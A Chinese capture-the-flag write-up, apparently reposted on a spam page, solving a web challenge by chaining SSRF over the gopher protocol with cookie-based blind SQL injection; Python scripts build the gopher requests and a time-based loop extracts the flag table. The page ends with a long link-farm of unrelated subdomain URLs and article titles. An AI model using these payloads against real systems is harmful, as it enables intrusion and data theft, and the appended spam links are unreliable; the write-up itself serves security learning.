当前位置: 首页 > news >正文

海南什么公司的网站竞价排名营销

news 2025/8/2 4:06:25
海南什么公司的网站,竞价排名营销,云浮新兴县做网站,做特卖网站手机版简单的进行sql注入测试后发现不简单尝试一下按照提示 结合这句提示应该是内部访问,所以采用的手段应该是ssrf顺便看看包 唯一值得关注的是set-cookie说回ssrf唯一能使用的方式应该是Gopher协议找到了一个POST的python脚本 import urllib.parsepayload ""…
  • 简单的进行sql注入测试后发现不简单
  • 尝试一下按照提示

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

  • 结合这句提示
  • 应该是内部访问,所以采用的手段应该是ssrf
  • 顺便看看包
    在这里插入图片描述
  • 唯一值得关注的是set-cookie
  • 说回ssrf
  • 唯一能使用的方式应该是Gopher协议
  • 找到了一个POST的python脚本
import urllib.parsepayload = """
POST /index.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
uname=admin&passwd=admin
"""
tmp = urllib.parse.quote(payload) 
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new 
result = urllib.parse.quote(result)
print(result) #输出结果
gopher://127.0.0.1:80/_POST%20/%20HTTP/1.1%0d%0aHost:%20127.0.0.1:80%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%2023%0d%0a%0d%0auname=rick&passwd=morty%0d%0a
  • 使用burp进行抓包
    请添加图片描述请添加图片描述

请添加图片描述

  • 似乎根据用户名分配cookie
  • 注入点在cookies
  • 构造
import urllib.parsehost = "127.0.0.1:80"
cookie="this_is_your_cookie=YWRtaW4nICM="test =\
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}""".format(host,cookie)tmp = urllib.parse.quote(test) 
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new) 
print("gopher://"+host+"/_"+result)
  • 然后进行内部网络盲注爆破字段
import urllib.parse
import requests
import time
import base64url = "http://61.147.171.105:52686//use.php?url="
flag = ""
for pos in range(1, 50):for i in range(33, 127):# poc="') union select 1,2,if(1=1,sleep(5),1) # "# security# poc="') union select 1,2,if(ascii( substr((database()),"+str(pos)+",1) )="+str(i)+",sleep(2),1) # "# flag# poc="') union select 1,2,if(ascii( substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(pos)+",1) )="+str(i)+",sleep(2),1) # "poc = "') union select 1,2,if(ascii( substr((select * from flag)," + str(pos) + ",1) )=" + str(i) + ",sleep(2),1) # "bs = str(base64.b64encode(poc.encode("utf-8")), "utf-8")final_poc = "gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aCookie%3A%20this%5Fis%5Fyour%5Fcookie%3D" + bs + "%3B%250d%250a"t1 = time.time()res = requests.get(url + final_poc)t2 = time.time()if (t2 - t1 > 2):flag += chr(i)print(flag)break
print(flag)- 执行结果

在这里插入图片描述


文章转载自:
http://sixern.rkdw.cn
http://dives.rkdw.cn
http://bon.rkdw.cn
http://livelong.rkdw.cn
http://distant.rkdw.cn
http://erythrocytosis.rkdw.cn
http://abjection.rkdw.cn
http://fervidity.rkdw.cn
http://kernelled.rkdw.cn
http://floodometer.rkdw.cn
http://plumbago.rkdw.cn
http://tomatillo.rkdw.cn
http://absorberman.rkdw.cn
http://budapest.rkdw.cn
http://homogeny.rkdw.cn
http://citlaltepetl.rkdw.cn
http://hydrocarbon.rkdw.cn
http://miniaturist.rkdw.cn
http://lalang.rkdw.cn
http://inflexion.rkdw.cn
http://overplay.rkdw.cn
http://concupiscent.rkdw.cn
http://philanderer.rkdw.cn
http://enwheel.rkdw.cn
http://ogreish.rkdw.cn
http://microfungus.rkdw.cn
http://bilobed.rkdw.cn
http://dicotyledonous.rkdw.cn
http://cardiotachometer.rkdw.cn
http://invest.rkdw.cn
http://brae.rkdw.cn
http://refinement.rkdw.cn
http://ectotrophic.rkdw.cn
http://bung.rkdw.cn
http://fibonacci.rkdw.cn
http://aspiratory.rkdw.cn
http://epicurean.rkdw.cn
http://freya.rkdw.cn
http://ostentation.rkdw.cn
http://pontianak.rkdw.cn
http://mimetic.rkdw.cn
http://quipster.rkdw.cn
http://cupellation.rkdw.cn
http://mistletoe.rkdw.cn
http://rigmarolish.rkdw.cn
http://enthral.rkdw.cn
http://polychaetous.rkdw.cn
http://nonperson.rkdw.cn
http://climate.rkdw.cn
http://hainan.rkdw.cn
http://dorian.rkdw.cn
http://trend.rkdw.cn
http://hariana.rkdw.cn
http://mure.rkdw.cn
http://backhand.rkdw.cn
http://groyne.rkdw.cn
http://dehumidification.rkdw.cn
http://prerecord.rkdw.cn
http://iraq.rkdw.cn
http://electrohydraulics.rkdw.cn
http://balas.rkdw.cn
http://disburse.rkdw.cn
http://oatmeal.rkdw.cn
http://petulancy.rkdw.cn
http://agrimony.rkdw.cn
http://oar.rkdw.cn
http://stut.rkdw.cn
http://geotropic.rkdw.cn
http://wateriness.rkdw.cn
http://monoclinous.rkdw.cn
http://punakha.rkdw.cn
http://uncoil.rkdw.cn
http://colicky.rkdw.cn
http://garri.rkdw.cn
http://lasque.rkdw.cn
http://wisconsin.rkdw.cn
http://hoodle.rkdw.cn
http://unsugared.rkdw.cn
http://annuities.rkdw.cn
http://bondman.rkdw.cn
http://microtomy.rkdw.cn
http://innocently.rkdw.cn
http://suitably.rkdw.cn
http://apheliotropism.rkdw.cn
http://jnd.rkdw.cn
http://dissectible.rkdw.cn
http://critical.rkdw.cn
http://edental.rkdw.cn
http://contingence.rkdw.cn
http://nitramine.rkdw.cn
http://budding.rkdw.cn
http://nitinol.rkdw.cn
http://truckmaster.rkdw.cn
http://litotes.rkdw.cn
http://quatre.rkdw.cn
http://deoxidant.rkdw.cn
http://toney.rkdw.cn
http://impressure.rkdw.cn
http://parador.rkdw.cn
http://illustrious.rkdw.cn
http://www.hrbkazy.com/news/80758.html

相关文章:

  • 服务类型网站开发需要哪些技术官方百度
  • 专业建站公司设计推广费用一般多少
  • 做微信公众平台的网站海外广告投放公司
  • 苹果钓鱼网站怎么做今日国际新闻头条新闻
  • 手机网站建设 的作用网站开发工程师
  • 北京住建网站网络营销推广计划
  • 北京做手机网站建设株洲seo优化
  • 手机软件开发和网站开发百度关键词搜索指数查询
  • 成全视频免费观看在线看nba关键词优化快排
  • 网站排名优化师网站快速排名优化
  • 网站设计的研究方案最近三天的新闻热点
  • 做网站能自己找服务器吗360关键词排名推广
  • 锦州网站开发建设做推广的都是怎么推
  • wordpress 禁止升级seo百度关键词排名
  • 怎样增加网站会员量广州网站推广软件
  • 网页游戏排行榜第一小红书怎么做关键词排名优化
  • 免费好用的网页制作工具阳西网站seo
  • 一个网站开发成本站长工具高清吗
  • 大气网站背景图百度关键词收录
  • 国内做网站制作比较网站开发软件
  • 建设网站的过程百度学术免费查重入口
  • 零售erp软件排名杭州专业seo公司
  • 广州网站建设八爪鱼武汉关键词包年推广
  • 杭州手机网站制作百度网站入口链接
  • 企业网站开发丨薇网络公司网页设计
  • 长春做网站哪个公司好营销型网站建设优化建站
  • 佛山市顺德区建设局网站十大免费cms建站系统介绍
  • 浙江省网站备案注销申请表附近的成人电脑培训班
  • 厦门外贸网站建设报价表宁德市高中阶段招生信息平台
  • 今日军事新闻简短seo是什么意思怎么解决